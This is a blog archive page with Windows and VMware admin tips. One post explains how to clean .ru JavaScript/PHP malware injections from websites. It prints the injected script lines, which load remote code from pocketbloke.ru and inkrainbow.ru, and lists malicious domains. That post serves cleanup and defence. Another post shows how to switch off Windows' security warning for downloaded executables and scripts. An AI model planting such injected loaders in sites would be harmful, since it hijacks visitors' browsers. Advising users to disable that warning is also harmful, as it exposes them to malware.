Archive

Archive for the ‘Security’ Category

VCS vSphere – Check new notifications stuck on Queued – VMware vCenter Update Manager Check Notification

February 7th, 2011 35 comments

So if you have a bunch of queued items in your VMware vSphere Client Recent Tasks that say “Check new notifications” initiated by “VMware vCenter Update Manager Check Notification“, there is an easy fix. Here’s what it looks like:

To fix, all you have to do is restart the VMware vCenter Update Manager Service on your VCS server. See below:

You can also do a “net stop vmware-ufad-vci” then a “net start vmware-ufad-vci” as well. Let me know if this works out for you! 🙂

Categories: ESX, How To, Randomness, Security, VIClient, VMware Tags:

Microsoft KB2501696 MHTML Vulnerability Test and Quick Fix Workaround – Group Policy Friendly

January 31st, 2011 5 comments

All Microsoft platforms since Windows XP SP3 are affected with this pretty nasty vulnerability. Referencing KB2501696 shows that this bug is caused by the way Windows handles MHTML documents. Internet Explorer is not the one at fault here, this is a Windows bug, however IE will be the attack vector for anyone wanting to take advantage of this flaw (and they will).

First off, to see if you are affected, follow this test link using Internet Explorer. If you get a popup box saying you are affected, then you should apply this fix right away. Also, make sure you are using Internet Explorer since most other browsers do not use the Windows MHTML libraries.

Microsoft gives a lame “FixIt” MSI that is not very GPO friendly. So I went out and wrote my own fix for it. It’s a batch script that you can run locally on a single computer or deploy as a “startup/shutdown script” in Group Policy without any edits needed. It is also compatible with x86 and x64 bit machines. Copy the following into your favorite text editor and give it a “.cmd” extension.

You can also click here to download it. Comment below and let me know how this works for you or if you have any other questions/comments/improvements!

Thanks!

Categories: How To, Malware, MHTML, Security, Vulnerability Tags:

Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010 124 comments

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation:  search only and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. They have an automatic script that will login to your site using FTP and append a link to PHP and JS files containing their malicious code.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run MalwareBytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords
  4. Update JAVA – According to this CERT KB
  5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.

Categories: Malware, PHP, Randomness, Security Tags:

Remove the Open File Security Warning in XP, Vista, and Windows 7

February 20th, 2009 34 comments

Every single time you download a program and try to run it, that stupid pop-up comes up and adds a whole extra click. The pop-up looks like this:

"Open File - Security Warning" - "The publisher could not be verified. Are you sure you want to run this software?" YES I'M SURE DAMNIT!

"Open File - Security Warning" - "The publisher could not be verified. Are you sure you want to run this software?" YES I'M SURE DAMNIT!

You can remove this in any Microsoft OS that is XP or later with the same steps. How do I remove this you ask? Like so:

1. Click Start, Run (or Windows+R) and type gpedit.msc

GPEdit.msc


2. Navigate to User Configuration -> Administrative Templates -> Windows Components -> Attachment Manager
then double click “Inclusion list for low file types” on the right pane

Group Policy

 

3. Select Enabled and enter in the file extensions you want to allow, including the preceding period and separated with a semicolon

.exe;.msi;.cmd;.bat;.vbs;

Inclusion list for low file types

Hit OK, exit out of your Group Policy window, and run your newly downloaded spyware infested program, free of the annoying “security” pop-up!